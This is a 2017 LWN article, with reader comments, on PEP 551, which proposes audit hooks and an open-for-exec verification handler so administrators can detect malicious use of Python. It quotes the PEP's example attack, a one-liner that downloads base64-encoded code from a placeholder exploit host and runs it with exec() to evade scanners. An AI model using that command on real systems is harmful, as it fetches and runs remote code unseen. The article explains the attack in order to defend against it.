|
|
Log in / Subscribe / Register

Python security transparency

By Jake Edge
September 6, 2017

As Steve Dower noted in his lightning talk at the 2017 Python Language Summit, Python itself can be considered a security vulnerability—because of its power, its presence on a target system is a boon to attackers. Now, Dower is trying to address parts of that problem with a Python Enhancement Proposal (PEP) that would enable system administrators and others to detect when Python is being used for a nefarious purpose by increasing the "security transparency" of the language. It is not a solution that truly thwarts an attacker's ability to use Python in an unauthorized way, but will make it easier for administrators to detect, and eventually disable, those kinds of attacks.

Threats

In PEP 551 (Security transparency in the Python runtime), Dower described the aim of the proposal: "The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection." He also posted his first draft of the PEP to the Python security-sig mailing list. In the preface of that post, he gave a bit more detail on where the idea has come from and what it is meant to do:

This comes out of work we've been doing at Microsoft to balance the flexibility of scripting languages with their usefulness to malicious users. PowerShell in particular has had a lot of work done, and we've been doing the same internally for Python. Things like transcripting (log every piece of code when it is compiled) and signature validation (prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to maintain these features - it is *not* intended to add specific security features to the core release. The aim is to be able to use a standard libpython3.7/python37.dll with a custom python3.7/python.exe that adds those features (listed in the PEP).

The kinds of attacks that PEP 551 seeks to address are advanced persistent threats (APTs) that make use of vulnerabilities of various sorts to establish a beachhead inside a network. Often Python is used from there to further the reach of the APT to other systems and networks, generally to extract data, but sometimes to damage data or hardware; Dower mentioned WannaCrypt (or WannaCry) and Stuxnet as examples of the latter. Python provides plenty for attackers to work with:

Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal logging. This allows attackers to download, decrypt, and execute malicious code with a single command::
    python -c "import urllib.request, base64;
               exec(base64.b64decode(urllib.request.urlopen(
	                   'http://my-exploit/py.b64')).decode())"
This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

New API

To combat the problem, Dower is proposing some additions to the Python API to "to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave". There are two parts to the proposal, adding audit hooks that will be called from certain sensitive places within the Python runtime and standard library, and adding a way to intercept calls to open a file for execution (e.g. imports) to perform additional checks, such as permission or integrity checks, before the operation is performed.

For auditing, there would be calls added to the C and Python APIs to add an audit event to the stream or to add a callback that would be made when an event is generated. For C, it would look as follows:

    typedef int (*hook_func)(const char *event, PyObject *args);

    /* Add an auditing hook */
    int PySys_AddAuditHook(hook_func hook);

    /* Raise an event with all auditing hooks */
    int PySys_Audit(const char *event, PyObject *args);
There is also an internal cleanup function described (_Py_ClearAuditHooks()). Python code could access these capabilities using:
    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None
Those are both taken from the PEP, which uses the type annotations for the Python code. As expected, addaudithook() takes a callable with effectively the same kinds of arguments (a string and tuple) as are passed to audit(). Both functions will return None.

CPython and the standard library would get calls to PySys_Audit() and sys.audit() in multiple locations, while audit hooks would be added by administrators. Multiple hooks can be added and they will be called in the order in which they were added; if a hook causes an exception, any further hooks are ignored and (normally) the Python runtime will exit.

The second API addition allows administrators to add a verification step before Python opens a file for execution. A single verification handler can be registered from C:


    typedef PyObject *(*handler_func)(const char *narrow,
				      const wchar_t *wide);

    /* Set the handler */
    int Py_SetOpenForExecuteHandler(handler_func handler);
The handler function will be passed the path of the file to be opened (in either narrow or wide format depending on the platform). The handler should do whatever verification it needs to do and return a file-like object that allows reading bytes, or raise an exception if the verification fails. Python code in the standard library that opens a file for execution will call:
    # Open a file using the handler
    os.open_for_exec(pathlike)
That function is a drop-in replacement for open(pathlike,'rb'), which opens the file for read-only, binary access. Since importlib will need to use open_for_exec() before os has been imported, there will be another version of it in the OS-specific nt and posix modules.

The PEP does note that it is easy for attackers' code to monkey patch importlib to remove the verification; auditing hooks should be used to detect and handle that case. In addition, there are other mechanisms that can be used to execute code that does not come directly from a file (e.g. compile(), exec()); auditing those will need to be part of any real solution.

Those new APIs provide the means for an administrator to "look inside" the Python runtime but, in order to be effective, changes need to be made to the Python binary to enable the features. That's where the spython binary comes into play. Though the name is already undergoing some bikeshedding, the idea is to provide an example of a "restricted" Python binary that could be installed on production systems to try to detect or thwart APTs. Dower's GitHub repository that contains his current implementation of the APIs has the source for spython.c.

Recommendations

The PEP strongly recommends that administrators create their own version of the spython program that reflects local policies and priorities. The example program takes no arguments other than a script name and logs all audit events to a scriptname.log file. It restricts importable modules (to only .py files, which disallows using cached bytecode from .pyc files) and global name lookup for the pickle module. It also disallows any hooks being added after those it installs. Spython can be built in the Python source tree and will be used in the test suite, but it will not be shipped with python.org binary distributions; other distributions are expected to only ship it as an example or test binary.

Overall, the idea is to give administrators a new level of control of the capabilities of the Python they install without having to hack the core Python code. Anecdotal evidence suggests that organizations are moving away from Python because it lacks a way to integrate the language with the other security features normally used on their systems. Installing Python becomes a liability in those environments, which makes administrators shy away from it.

The PEP comes with a set of recommendations for administrators to give them a guide of the best practices for using the "security transparency" features it enables. For example:

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Other recommendations include using the native auditing system, rather than simply writing local files, not aborting the interpreter for abnormal events since it will encourage attackers to work around those features (because detection is a higher priority than prevention), and to correlate events that should happen together (e.g. import, followed by open_for_exec(), then compile) in order to detect attempts to bypass auditing. The PEP notes that the list is (necessarily) incomplete and that more recommendations may be added over time.

So far, no real performance numbers have been gathered. The intent is for the feature to have minimal impact when it is not being used. Since it is an opt-in feature, though, the performance with hooks enabled is not really at issue (though one presumes it will be reasonably optimized). "Preliminary testing shows that calling sys.audit with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact." Another unfinished piece is to add more hook locations to the core and standard library.

Reception

The comments on the proposal have been fairly limited, but are quite favorable overall. There were some suggestions and thoughts in response to the first posting in the security-sig mailing list. The PEP was then updated and posted to python-dev for wider review. In the end, the PEP really only provides a way for administrators to look inside the interpreter, what they do with that ability is largely beyond its scope. But it does enable administrators to relatively easily do something they cannot do now.

There were concerns posted in both threads about circumventing the auditing (or forging audit events), but both of those are seen (by Dower, at least) as potential red flags for detecting the malicious activity. However, moving to a separate module (rather than using sys), as suggested by Nick Coghlan, was seen as making it too easy to replace the functionality. As Dower put it:

It's important to minimise the surface area of these features, and having the ability to disable auditing by shadowing/replacing a module is a little scary. At least when you replace sys you've got to do a bit of work to keep it a secret. (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

James Powell, who did a lot of initial research and implementation of the feature, also chimed in:

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes.

We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

Adding the feature seems like a near no-brainer, unless some serious performance or other problems rear their head—not a likely outcome, seemingly. So far, there has been no reaction from Guido van Rossum, Python's benevolent dictator for life (BDFL), but he will ultimately either rule on it or appoint a BDFL-delegate to do so. It is quite plausible we will see PEP 551 delivered in Python 3.7, which is due in mid-2018.


Index entries for this article
SecurityPython


to post comments

Python security transparency

Posted Sep 6, 2017 21:21 UTC (Wed) by jhoblitt (subscriber, #77733) [Link] (5 responses)

Could someone provide an example of an "existing security systems" that language runtimes other than python are integrated with?

I would naively think that auditing syscalls or the network stack would be more robust then trying to instrument every runtime that might be on a system.

Python security transparency

Posted Sep 6, 2017 21:32 UTC (Wed) by fratti (subscriber, #105722) [Link]

This development is in direct response to sysadmins complaining that the Windows ability to not let any untrusted code run on the system was circumvented by PowerShell being on the system, which could execute arbitrary code. Microsoft correctly identified that this problem extends to other scripting runtimes. So I guess you'd have to ask sysadmins that do Windows-y Enterprise-y things about their particular systems, but it's definitely not a scare conjured up by Microsoft.

Python security transparency

Posted Sep 6, 2017 21:49 UTC (Wed) by mwsealey (subscriber, #71282) [Link] (2 responses)

From a naïve perspective you could say an "existing security system" is basically Windows Defender, in this case, or something very similar - it's providing firewall filtering and hooks system calls to look for viruses, so it has innate capability to try and intercept network traffic to make sure it's not malicious and to intercept file opens for the same reason.

Auditing syscalls and the network stack at the level it's at right now is really not as effective since there is no application context in place - a stream of bytes over a network connection has no link to "this will be passed to a language interpreter for execution", for example. At some level you can say "don't open connections to this domain or IP" or that a very well known attack signature should be filtered and blocked, but you can enable any transformation of data to elude that detection.

Hooks in Python so that it can filter the network traffic and look for signatures at the language level (therefore in context) and filter any files (after transformation, before it's directly executed!) opened for arbitrary execution to look for signatures, would be very useful.

One might deny any file opened for arbitrary code execution, or just any network URL, or just the ones that seemed to match particular known or heuristically-detected threats dependent on security policy of an organization just as I can prevent all my applications from working at all on Public networks vs. the domain network if I want to. And that's pretty much what PowerShell has available.

Python security transparency

Posted Sep 6, 2017 23:17 UTC (Wed) by jhoblitt (subscriber, #77733) [Link] (1 responses)

I'm not sure I follow the reasoning that syscall auditing doesn't have context. Surely even the window nt kernel knows which process is calling `connect(3)` (or the windows equivalent)?

Python security transparency

Posted Sep 7, 2017 1:12 UTC (Thu) by Fowl (subscriber, #65667) [Link]

But logging that "Python Interpreter" accessed the network is less useful than "evil.py".

Python security transparency

Posted Sep 11, 2017 15:35 UTC (Mon) by BenHutchings (subscriber, #37955) [Link]


Copyright © 2017, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds